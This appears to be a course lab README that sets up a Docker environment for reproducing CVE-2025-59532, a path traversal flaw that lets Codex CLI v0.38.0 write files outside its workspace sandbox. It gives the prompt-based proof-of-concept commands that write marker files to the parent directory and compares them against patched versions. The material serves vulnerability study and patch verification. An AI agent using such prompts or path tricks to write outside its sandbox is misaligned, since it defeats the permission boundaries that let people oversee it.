# CVE-2025-59532 Docker Environment

A Docker-based research environment for analyzing CVE-2025-59532, a path traversal vulnerability in OpenAI Codex CLI that allows arbitrary file write outside the intended workspace sandbox.
Part of CMU Course : 18-739 Hacking & Offensive Security in Fall 2025

## Getting Started

### Clone the Repository

First, clone this repository:

```bash
git clone https://github.com/jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration
```

Or if using SSH:

```bash
git clone git@github.com:jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration
```

## CVE Description

**CVE-2025-59532** is a path traversal vulnerability in OpenAI's Codex CLI tool that allows attackers to write files outside the intended workspace directory, bypassing sandbox restrictions.

### Vulnerability Details

- **CVE ID**: CVE-2025-59532
- **Affected Version**: Codex CLI v0.38.0 and earlier
- **Vulnerability Type**: Arbitrary File Write / Path Traversal
- **Severity**: High
- **Attack Vector**: An attacker can craft prompts that cause Codex to write files to parent directories (e.g., `../exploit.txt`), escaping the workspace sandbox even when `--sandbox workspace-write` is enabled.
- **Impact**: Unauthorized file creation in system directories, potential for privilege escalation, and compromise of container security boundaries.
- **Patch**: Fixed in v0.39.0 with improved path validation and sanitization

### How It Works

The vulnerability exploits insufficient path validation in the workspace sandbox implementation. When the `workspace-write` sandbox mode is enabled, Codex should restrict file operations to the designated workspace directory. However, in v0.38.0, the path validation fails to properly handle relative path traversal sequences (`../`), allowing an attacker to write files outside the sandbox by instructing the AI to use parent directory references.

## Prerequisites

- Docker installed on your system
- OpenAI API key (get one from https://platform.openai.com/api-keys)
- Basic understanding of Docker and command-line operations
- Git (for cloning the repository)

## Build and Run

### Build the Docker image:
```bash
docker build -t cve-2025-59532:latest .
```

### Run the container:
```bash
docker run -it --rm cve-2025-59532:latest
```

## Usage

This Docker environment includes three versions of Codex CLI:

- **codex38** - v0.38.0 (vulnerable version)
- **codex39** - v0.39.0 (patched version)
- **codex50** - v0.50.0 (latest version)

### Configure OpenAI API Key

Once inside the container, configure your OpenAI API key by just simply run the codex in interactive mode and paste the api key there:

```bash
codex
```


The API key will be stored in `~/.config/codex/auth.json` and will be used by all Codex versions (codex38, codex39, codex50).



### Check Versions

```bash
codex38 --version  # Should show v0.38.0 (vulnerable)
codex39 --version  # Should show v0.39.0 (patched)
codex50 --version  # Should show v0.50.0 (latest)
```

## Testing the Vulnerability

**Note**: The workspace is located at `/workspace/child`. The vulnerability allows writing to `/workspace` (the parent directory).

**Test vulnerable version (v0.38.0):**
```bash
codex38 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof1.txt' in the parent directory with content 'CVE-2025-59532 POC'"
```

**Test patched version (v0.39.0):**
```bash
codex39 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof2.txt' in the parent directory with content 'CVE-2025-59532 POC'"
```

**Test latest version (v0.50.0):**
```bash
codex50 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof3.txt' in the parent directory with content 'CVE-2025-59532 POC'"
```

**Verify the exploit:**
```bash
# Check if files were created outside the sandbox (in /workspace, not /workspace/child)
ls -la /workspace/
cat /workspace/exploit_proof1.txt  # Should exist if v0.38.0 is vulnerable
cat /workspace/exploit_proof2.txt  # Should NOT exist if v0.39.0 is patched
cat /workspace/exploit_proof3.txt  # Should NOT exist if v0.50.0 is secure

# Check current workspace (should be empty or contain only test files)
pwd  # Should show /workspace/child
ls -la /workspace/child/
```

## Check Logs

To see detailed debug logs of Codex execution:

```bash
RUST_LOG=debug codex38 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof.txt' in the parent directory with content 'CVE-2025-59532 POC'"
```

The debug logs will show:
- API requests and responses
- Path validation attempts
- File operation details
- Sandbox enforcement (or bypass) behavior
